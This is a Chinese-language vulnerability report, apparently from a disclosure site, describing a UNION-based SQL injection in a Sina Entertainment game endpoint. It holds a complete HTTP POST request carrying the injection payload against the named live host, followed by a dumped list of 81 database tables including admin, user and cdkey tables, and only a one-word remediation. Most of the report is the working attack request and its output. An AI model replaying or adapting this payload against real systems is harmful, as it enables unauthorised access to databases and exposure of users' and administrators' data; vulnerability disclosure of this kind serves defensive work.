首页 » 漏洞 » 新浪娱乐某处SQL注入多库泄漏(可union)

新浪娱乐某处SQL注入多库泄漏(可union)

 
code 区域
POST /ent/address.php HTTP/1.1

Host: game.ent.sina.com.cn

Proxy-Connection: keep-alive

Content-Length: 125

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://game.ent.sina.com.cn

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://game.ent.sina.com.cn/ent/user_address.php

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6

Cookie:



opration=query_mail&mail_id=-7922 UNION ALL SELECT NULL,NULL,NULL,NULL,user(),NULL,NULL,NULL,NULL from ds_admin limit 1-- ---

新浪娱乐某处SQL注入多库泄漏(可union)

漏洞证明:

code 区域
Database: bookgames

[81 tables]

+------------------------------+

| ds_activit |

| ds_ad |

| ds_admin |

| ds_admin_log |

| ds_advertisement |

| ds_auction_action_log |

| ds_auction_address |

| ds_auction_gifts_config |

| ds_auction_give_price |

| ds_ct_app_cdkey_rewards |

| ds_ct_app_cdkeys |

| ds_ct_card_list |

| ds_event_choujiang_times |

| ds_event_duihuan_log |

| ds_event_prize_info |

| ds_game_company |

| ds_game_info |

| ds_game_server |

| ds_games |

| ds_gift |

| ds_gift_addtion |

| ds_gift_data |

| ds_gift_exchange_record |

| ds_gift_mail_info |

| ds_gift_photo |

| ds_gift_show_type |

| ds_gift_type |

| ds_guess |

| ds_guess_match |

| ds_guess_record |

| ds_guess_user_score |

| ds_guest_focus |

| ds_hqad |

| ds_jifen_prize_cdkey |

| ds_jifen_prize_gifts |

| ds_jifen_prize_record |

| ds_libao |

| ds_sign_lucky |

| ds_tag |

| ds_top_header_games |

| ds_user_compensate_score_log |

| ds_user_from |

| ds_user_inserver |

| ds_user_score_log |

| ds_user_score_total |

| ds_user_score_unusual_record |

| ds_user_small_games_0 |

| ds_user_small_games_1 |

| ds_user_small_games_2 |

| ds_user_small_games_3 |

| ds_user_small_games_4 |

| ds_user_small_games_5 |

| ds_user_small_games_6 |

| ds_user_small_games_7 |

| ds_user_small_games_8 |

| ds_user_small_games_9 |

| ds_users_0 |

| ds_users_1 |

| ds_users_2 |

| ds_users_3 |

| ds_users_4 |

| ds_users_5 |

| ds_users_6 |

| ds_users_7 |

| ds_users_8 |

| ds_users_9 |

| ds_vantages_gift_type |

| ds_web_games_record_0 |

| ds_web_games_record_1 |

| ds_web_games_record_2 |

| ds_web_games_record_3 |

| ds_web_games_record_4 |

| ds_web_games_record_5 |

| ds_web_games_record_6 |

| ds_web_games_record_7 |

| ds_web_games_record_8 |

| ds_web_games_record_9 |

| ds_zhenying_vote_active |

| ss_jifen_prize_cdkey |

| ss_jifen_prize_gifts |

| ss_jifen_prize_record |

+------------------------------+

修复方案:

过滤

原文链接:新浪娱乐某处SQL注入多库泄漏(可union),转载请注明来源!

0